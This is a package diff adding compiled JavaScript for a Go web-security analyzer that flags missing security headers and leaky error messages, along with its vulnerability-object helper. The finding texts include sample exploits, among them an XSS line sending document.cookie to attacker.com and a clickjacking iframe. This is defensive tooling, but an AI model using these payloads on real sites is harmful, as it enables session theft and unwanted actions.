codeslick-cli 1.1.6 → 1.2.0

package/dist/src/lib/analyzers/go/security-checks/web-security.js

@@ -0,0 +1,244 @@
+"use strict";
+/**
+ * Go Web Security Checks
+ * OWASP A05:2025 - Security Misconfiguration
+ *
+ * Detects missing security headers and information disclosure vulnerabilities
+ * in Go web applications.
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.checkWebSecurity = checkWebSecurity;
+const createVulnerability_1 = require("../utils/createVulnerability");
+/**
+ * Checks for web security misconfigurations
+ *
+ * Covers:
+ * - Check #1: Missing X-Frame-Options header (MEDIUM)
+ * - Check #2: Missing HSTS header (MEDIUM)
+ * - Check #3: Missing Content-Security-Policy header (MEDIUM)
+ * - Check #4: Information disclosure via error messages (MEDIUM)
+ *
+ * @param lines - Array of code lines
+ * @returns Array of security vulnerabilities found
+ */
+function checkWebSecurity(lines) {
+    const vulnerabilities = [];
+    let inMultiLineComment = false;
+    // Track HTTP handlers and response header setting
+    const fileContent = lines.join('\n');
+    const hasHTTPHandlers = /http\.ResponseWriter/i.test(fileContent);
+    // Track which security headers are set in the file (only if there are HTTP handlers)
+    const hasXFrameOptions = hasHTTPHandlers && /X-Frame-Options|Header\(\)\.Set\([^)]*X-Frame-Options/i.test(fileContent);
+    const hasHSTS = hasHTTPHandlers && /Strict-Transport-Security|Header\(\)\.Set\([^)]*Strict-Transport-Security/i.test(fileContent);
+    const hasCSP = hasHTTPHandlers && /Content-Security-Policy|Header\(\)\.Set\([^)]*Content-Security-Policy/i.test(fileContent);
+    lines.forEach((line, index) => {
+        const lineNumber = index + 1;
+        const trimmed = line.trim();
+        // Track multi-line comments (/* ... */)
+        if (trimmed.includes('/*')) {
+            inMultiLineComment = true;
+        }
+        if (trimmed.includes('*/')) {
+            inMultiLineComment = false;
+            return;
+        }
+        // Skip comments and empty lines
+        if (!trimmed || inMultiLineComment || trimmed.startsWith('//')) {
+            return;
+        }
+        // =============================================================================
+        // Check #1-3: Missing Security Headers
+        // =============================================================================
+        // CVSS 5.5, 5.0, 5.5 - MEDIUM
+        // Detects HTTP handlers that don't set security headers
+        // Check for HTTP handler function declaration
+        const isFuncDeclaration = /^func\s+(\w+)\s*\(/i.test(trimmed);
+        const hasResponseWriter = /http\.ResponseWriter/i.test(trimmed);
+        if (isFuncDeclaration && hasResponseWriter) {
+            const funcMatch = trimmed.match(/^func\s+(\w+)/i);
+            const handlerName = funcMatch ? funcMatch[1] : 'handler';
+            // Look ahead in the function body (next 30 lines) for security headers
+            let functionHasXFrameOptions = false;
+            let functionHasHSTS = false;
+            let functionHasCSP = false;
+            for (let i = index; i < Math.min(index + 30, lines.length); i++) {
+                const bodyLine = lines[i].trim();
+                // Check for next function (end of current function)
+                if (i > index && /^func\s+\w+/.test(bodyLine)) {
+                    break;
+                }
+                if (/X-Frame-Options|Header\(\)\.Set\([^)]*X-Frame-Options/i.test(bodyLine)) {
+                    functionHasXFrameOptions = true;
+                }
+                if (/Strict-Transport-Security|Header\(\)\.Set\([^)]*Strict-Transport-Security/i.test(bodyLine)) {
+                    functionHasHSTS = true;
+                }
+                if (/Content-Security-Policy|Header\(\)\.Set\([^)]*Content-Security-Policy/i.test(bodyLine)) {
+                    functionHasCSP = true;
+                }
+            }
+            // Check #1: Missing X-Frame-Options
+            if (!functionHasXFrameOptions && !hasXFrameOptions) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-missing-xframe',
+                    severity: 'medium',
+                    confidence: 'medium',
+                    message: `Missing X-Frame-Options header in HTTP handler '${handlerName}'`,
+                    line: lineNumber,
+                    suggestion: 'Set X-Frame-Options header to "DENY" or "SAMEORIGIN" to prevent clickjacking',
+                    owasp: 'A05:2025 - Security Misconfiguration',
+                    cwe: 'CWE-1021',
+                    pciDss: 'PCI DSS 6.5.10',
+                    remediation: {
+                        explanation: 'The X-Frame-Options header prevents clickjacking attacks by controlling whether your page can be embedded in frames. Without it, attackers can overlay invisible frames to trick users into clicking malicious links.',
+                        before: `func handler(w http.ResponseWriter, r *http.Request) {\n    // No X-Frame-Options header\n    w.Write([]byte("response"))\n}`,
+                        after: `func handler(w http.ResponseWriter, r *http.Request) {\n    w.Header().Set("X-Frame-Options", "DENY")\n    w.Write([]byte("response"))\n}`
+                    },
+                    attackVector: {
+                        description: 'Clickjacking (UI redressing) attacks overlay invisible frames over legitimate pages, tricking users into performing unintended actions like changing passwords or transferring money.',
+                        exploitExample: `<!-- Attacker's page -->\n<iframe src="https://victim.com/transfer?amount=1000&to=attacker"></iframe>\n<!-- Victim thinks they're clicking a game but actually initiating transfer -->`,
+                        realWorldImpact: [
+                            'Clickjacking attacks enabling unauthorized actions',
+                            'Social engineering via UI redressing',
+                            'Account takeover through tricked password changes',
+                            'Unauthorized financial transactions',
+                            'Compliance violations (OWASP, PCI DSS)'
+                        ]
+                    }
+                }));
+            }
+            // Check #2: Missing HSTS
+            if (!functionHasHSTS && !hasHSTS) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-missing-hsts',
+                    severity: 'medium',
+                    confidence: 'medium',
+                    message: `Missing HSTS (Strict-Transport-Security) header in HTTP handler '${handlerName}'`,
+                    line: lineNumber,
+                    suggestion: 'Set Strict-Transport-Security header to enforce HTTPS connections',
+                    owasp: 'A05:2025 - Security Misconfiguration',
+                    cwe: 'CWE-523',
+                    pciDss: 'PCI DSS 4.1',
+                    remediation: {
+                        explanation: 'HSTS (HTTP Strict Transport Security) forces browsers to only connect via HTTPS, preventing protocol downgrade attacks and cookie hijacking. Required for PCI DSS compliance.',
+                        before: `func handler(w http.ResponseWriter, r *http.Request) {\n    // No HSTS header - vulnerable to protocol downgrade\n    w.Write([]byte("response"))\n}`,
+                        after: `func handler(w http.ResponseWriter, r *http.Request) {\n    w.Header().Set("Strict-Transport-Security", "max-age=31536000; includeSubDomains")\n    w.Write([]byte("response"))\n}`
+                    },
+                    attackVector: {
+                        description: 'Without HSTS, attackers can downgrade HTTPS connections to HTTP, enabling man-in-the-middle attacks to steal session cookies and credentials.',
+                        exploitExample: `// Attacker performs SSL strip attack:\n// 1. Intercepts initial HTTP request\n// 2. Downgrades HTTPS to HTTP\n// 3. Steals session cookies and credentials\n// HSTS prevents this by forcing HTTPS-only`,
+                        realWorldImpact: [
+                            'Protocol downgrade attacks (SSL stripping)',
+                            'Session cookie theft via MITM',
+                            'Credential interception',
+                            'PCI DSS compliance failures',
+                            'Browser security warnings for users'
+                        ]
+                    }
+                }));
+            }
+            // Check #3: Missing Content-Security-Policy
+            if (!functionHasCSP && !hasCSP) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-missing-csp',
+                    severity: 'medium',
+                    confidence: 'medium',
+                    message: `Missing Content-Security-Policy header in HTTP handler '${handlerName}'`,
+                    line: lineNumber,
+                    suggestion: 'Set Content-Security-Policy header to prevent XSS attacks',
+                    owasp: 'A05:2025 - Security Misconfiguration',
+                    cwe: 'CWE-693',
+                    pciDss: 'PCI DSS 6.5.7',
+                    remediation: {
+                        explanation: 'Content-Security-Policy (CSP) prevents XSS attacks by whitelisting trusted sources for scripts, styles, and other resources. It\'s a defense-in-depth measure against injection attacks.',
+                        before: `func handler(w http.ResponseWriter, r *http.Request) {\n    // No CSP - vulnerable to XSS\n    w.Write([]byte("<html>...</html>"))\n}`,
+                        after: `func handler(w http.ResponseWriter, r *http.Request) {\n    w.Header().Set("Content-Security-Policy", "default-src 'self'; script-src 'self'")\n    w.Write([]byte("<html>...</html>"))\n}`
+                    },
+                    attackVector: {
+                        description: 'Without CSP, successful XSS attacks can execute arbitrary JavaScript, even if input is sanitized elsewhere. CSP provides defense-in-depth by blocking inline scripts and untrusted sources.',
+                        exploitExample: `// If XSS bypasses other defenses:\n<script>fetch('https://attacker.com?cookie='+document.cookie)</script>\n// CSP would block this even if injected`,
+                        realWorldImpact: [
+                            'Defense-in-depth against XSS attacks',
+                            'Blocks inline scripts and eval()',
+                            'Prevents data exfiltration to untrusted domains',
+                            'Mitigates impact of successful XSS',
+                            'Required for security-conscious applications'
+                        ]
+                    }
+                }));
+            }
+        }
+        // =============================================================================
+        // Check #4: Information Disclosure
+        // =============================================================================
+        // CVSS 6.8 - MEDIUM
+        // Detects error responses that expose stack traces or sensitive information
+        // Check for error responses with debug information
+        const hasErrorResponse = /http\.Error\s*\(/i.test(trimmed);
+        const hasDebugInfo = /error|err|debug|stack|trace|panic/i.test(trimmed);
+        if (hasErrorResponse && hasDebugInfo) {
+            // Flag if error response includes actual error variable (not static string)
+            // Check for: err.Error(), fmt.Sprintf with err, panic, or error variable in response
+            if (/\berr\.Error\(\)|fmt\.Sprintf.*\berr\b|panic\(|http\.Error.*\berr\b/i.test(trimmed)) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-info-disclosure',
+                    severity: 'medium',
+                    confidence: 'medium',
+                    message: 'Information disclosure: Error response may expose stack traces or internal details',
+                    line: lineNumber,
+                    suggestion: 'Return generic error messages to users; log detailed errors internally',
+                    owasp: 'A05:2025 - Security Misconfiguration',
+                    cwe: 'CWE-209',
+                    pciDss: 'PCI DSS 6.5.5',
+                    remediation: {
+                        explanation: 'Exposing detailed error messages reveals internal application structure, file paths, database schemas, and stack traces. This information helps attackers plan targeted attacks.',
+                        before: `if err != nil {\n    http.Error(w, err.Error(), 500) // Exposes internal details\n}`,
+                        after: `if err != nil {\n    log.Printf("Internal error: %v", err) // Log internally\n    http.Error(w, "Internal server error", 500) // Generic message to user\n}`
+                    },
+                    attackVector: {
+                        description: 'Detailed error messages expose database schemas, file paths, internal IP addresses, and software versions, enabling reconnaissance for targeted attacks.',
+                        exploitExample: `// Exposed error reveals:\n"SQL error: table 'users' column 'password_hash' not found at /app/db/queries.go:42"\n// Attacker learns: database schema, file structure, Go version`,
+                        realWorldImpact: [
+                            'Information leakage about internal architecture',
+                            'Database schema and table structure exposed',
+                            'File paths and directory structure revealed',
+                            'Software versions and dependencies disclosed',
+                            'Enables targeted attacks and exploits'
+                        ]
+                    }
+                }));
+            }
+        }
+        // Also check for debug mode or verbose error logging in production
+        if (/debug\s*(?:=|:=)\s*true|verbose\s*(?:=|:=)\s*true/i.test(trimmed)) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-info-disclosure',
+                severity: 'medium',
+                confidence: 'low',
+                message: 'Information disclosure: Debug mode enabled may expose sensitive information',
+                line: lineNumber,
+                suggestion: 'Disable debug mode in production; use environment variables for configuration',
+                owasp: 'A05:2025 - Security Misconfiguration',
+                cwe: 'CWE-489',
+                pciDss: 'PCI DSS 6.5.5',
+                remediation: {
+                    explanation: 'Debug mode often outputs verbose logs, stack traces, and internal state. This should be disabled in production and controlled via environment variables.',
+                    before: `const debug = true // Hardcoded debug mode`,
+                    after: `var debug = os.Getenv("DEBUG") == "true" // Controlled via environment`
+                },
+                attackVector: {
+                    description: 'Debug mode enables verbose logging of internal operations, potentially exposing credentials, API keys, user data, and business logic.',
+                    exploitExample: `// Debug mode logs:\n[DEBUG] SQL: SELECT * FROM users WHERE email='admin@example.com' AND password='...'`,
+                    realWorldImpact: [
+                        'Credentials logged in plaintext',
+                        'API keys exposed in logs',
+                        'Business logic revealed',
+                        'Performance degradation from excessive logging'
+                    ]
+                }
+            }));
+        }
+    });
+    return vulnerabilities;
+}
+//# sourceMappingURL=web-security.js.map

package/dist/src/lib/analyzers/go/security-checks/web-security.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"web-security.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/go/security-checks/web-security.ts"],"names":[],"mappings":"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"}

package/dist/src/lib/analyzers/go/utils/createVulnerability.d.ts

@@ -0,0 +1,58 @@
+/**
+ * Utility function to create security vulnerability objects for Go analyzer
+ *
+ * This module provides a standardized way to create SecurityVulnerability objects
+ * with proper CVSS scoring, OWASP mapping, and compliance information.
+ */
+import { SecurityVulnerability } from '../../types';
+/**
+ * Parameters for creating a security vulnerability object
+ */
+interface VulnerabilityParams {
+    category: string;
+    severity: string;
+    confidence: string;
+    message: string;
+    line: number;
+    suggestion: string;
+    owasp: string;
+    cwe: string;
+    pciDss: string;
+    securityRelevant?: boolean;
+    remediation: {
+        explanation: string;
+        before: string;
+        after: string;
+    };
+    attackVector: {
+        description: string;
+        exploitExample?: string;
+        realWorldImpact: string[];
+    };
+}
+/**
+ * Creates a standardized security vulnerability object for Go code
+ * Supports both object parameter style (OWASP 2025) and legacy individual parameters
+ *
+ * @param params - Object containing all vulnerability parameters (OWASP 2025 style)
+ * @returns SecurityVulnerability object with all required fields
+ */
+export declare function createGoSecurityVulnerability(params: VulnerabilityParams): SecurityVulnerability;
+/**
+ * Legacy function signature for backward compatibility
+ *
+ * @param vulnerabilityType - Type identifier for severity scoring (e.g., 'go-sql-injection')
+ * @param message - User-friendly vulnerability message
+ * @param suggestion - Remediation suggestion
+ * @param lineNumber - Line number where vulnerability was detected
+ * @param attackDescription - Detailed description of the attack vector
+ * @param exploitExample - Example of how the vulnerability can be exploited
+ * @param realWorldImpact - Array of potential real-world impacts
+ * @param remediationBefore - Code example showing vulnerable pattern
+ * @param remediationAfter - Code example showing secure pattern
+ * @param remediationExplanation - Explanation of why the fix works
+ * @returns SecurityVulnerability object with all required fields
+ */
+export declare function createGoSecurityVulnerability(vulnerabilityType: string, message: string, suggestion: string, lineNumber: number, attackDescription: string, exploitExample: string, realWorldImpact: string[], remediationBefore: string, remediationAfter: string, remediationExplanation: string): SecurityVulnerability;
+export {};
+//# sourceMappingURL=createVulnerability.d.ts.map

package/dist/src/lib/analyzers/go/utils/createVulnerability.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"createVulnerability.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/go/utils/createVulnerability.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAIpD;;GAEG;AACH,UAAU,mBAAmB;IAC3B,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,MAAM,CAAC;IACjB,UAAU,EAAE,MAAM,CAAC;IACnB,OAAO,EAAE,MAAM,CAAC;IAChB,IAAI,EAAE,MAAM,CAAC;IACb,UAAU,EAAE,MAAM,CAAC;IACnB,KAAK,EAAE,MAAM,CAAC;IACd,GAAG,EAAE,MAAM,CAAC;IACZ,MAAM,EAAE,MAAM,CAAC;IACf,gBAAgB,CAAC,EAAE,OAAO,CAAC;IAC3B,WAAW,EAAE;QACX,WAAW,EAAE,MAAM,CAAC;QACpB,MAAM,EAAE,MAAM,CAAC;QACf,KAAK,EAAE,MAAM,CAAC;KACf,CAAC;IACF,YAAY,EAAE;QACZ,WAAW,EAAE,MAAM,CAAC;QACpB,cAAc,CAAC,EAAE,MAAM,CAAC;QACxB,eAAe,EAAE,MAAM,EAAE,CAAC;KAC3B,CAAC;CACH;AAED;;;;;;GAMG;AACH,wBAAgB,6BAA6B,CAC3C,MAAM,EAAE,mBAAmB,GAC1B,qBAAqB,CAAC;AAEzB;;;;;;;;;;;;;;GAcG;AACH,wBAAgB,6BAA6B,CAC3C,iBAAiB,EAAE,MAAM,EACzB,OAAO,EAAE,MAAM,EACf,UAAU,EAAE,MAAM,EAClB,UAAU,EAAE,MAAM,EAClB,iBAAiB,EAAE,MAAM,EACzB,cAAc,EAAE,MAAM,EACtB,eAAe,EAAE,MAAM,EAAE,EACzB,iBAAiB,EAAE,MAAM,EACzB,gBAAgB,EAAE,MAAM,EACxB,sBAAsB,EAAE,MAAM,GAC7B,qBAAqB,CAAC"}

package/dist/src/lib/analyzers/go/utils/createVulnerability.js

@@ -0,0 +1,71 @@
+"use strict";
+/**
+ * Utility function to create security vulnerability objects for Go analyzer
+ *
+ * This module provides a standardized way to create SecurityVulnerability objects
+ * with proper CVSS scoring, OWASP mapping, and compliance information.
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.createGoSecurityVulnerability = createGoSecurityVulnerability;
+const severity_scoring_1 = require("../../../security/severity-scoring");
+const compliance_mapping_1 = require("../../../security/compliance-mapping");
+function createGoSecurityVulnerability(paramsOrType, message, suggestion, lineNumber, attackDescription, exploitExample, realWorldImpact, remediationBefore, remediationAfter, remediationExplanation) {
+    // Check if using new object-style parameters (OWASP 2025)
+    if (typeof paramsOrType === 'object') {
+        const params = paramsOrType;
+        const scoring = (0, severity_scoring_1.calculateSeverityScore)(params.category);
+        const compliance = (0, compliance_mapping_1.getComplianceMapping)(params.category);
+        return {
+            severity: params.severity,
+            message: params.message,
+            suggestion: params.suggestion,
+            line: params.line,
+            category: params.category,
+            securityRelevant: params.securityRelevant,
+            cvssScore: scoring.cvssScore,
+            exploitLikelihood: scoring.exploitLikelihood,
+            impact: scoring.impact,
+            owasp: params.owasp,
+            cwe: params.cwe,
+            pciDss: params.pciDss,
+            attackVector: {
+                description: params.attackVector.description,
+                exploitExample: params.attackVector.exploitExample || '',
+                realWorldImpact: params.attackVector.realWorldImpact
+            },
+            remediation: {
+                before: params.remediation.before,
+                after: params.remediation.after,
+                explanation: params.remediation.explanation
+            }
+        };
+    }
+    // Legacy 10-parameter signature (backward compatibility)
+    const vulnerabilityType = paramsOrType;
+    const scoring = (0, severity_scoring_1.calculateSeverityScore)(vulnerabilityType);
+    const compliance = (0, compliance_mapping_1.getComplianceMapping)(vulnerabilityType);
+    return {
+        severity: scoring.severity,
+        message: message,
+        suggestion: suggestion,
+        line: lineNumber,
+        category: vulnerabilityType,
+        cvssScore: scoring.cvssScore,
+        exploitLikelihood: scoring.exploitLikelihood,
+        impact: scoring.impact,
+        owasp: compliance.owasp,
+        cwe: compliance.cwe,
+        pciDss: compliance.pciDss,
+        attackVector: {
+            description: attackDescription,
+            exploitExample: exploitExample,
+            realWorldImpact: realWorldImpact
+        },
+        remediation: {
+            before: remediationBefore,
+            after: remediationAfter,
+            explanation: remediationExplanation
+        }
+    };
+}
+//# sourceMappingURL=createVulnerability.js.map

package/dist/src/lib/analyzers/go/utils/createVulnerability.js.map

@@ -0,0 +1 @@
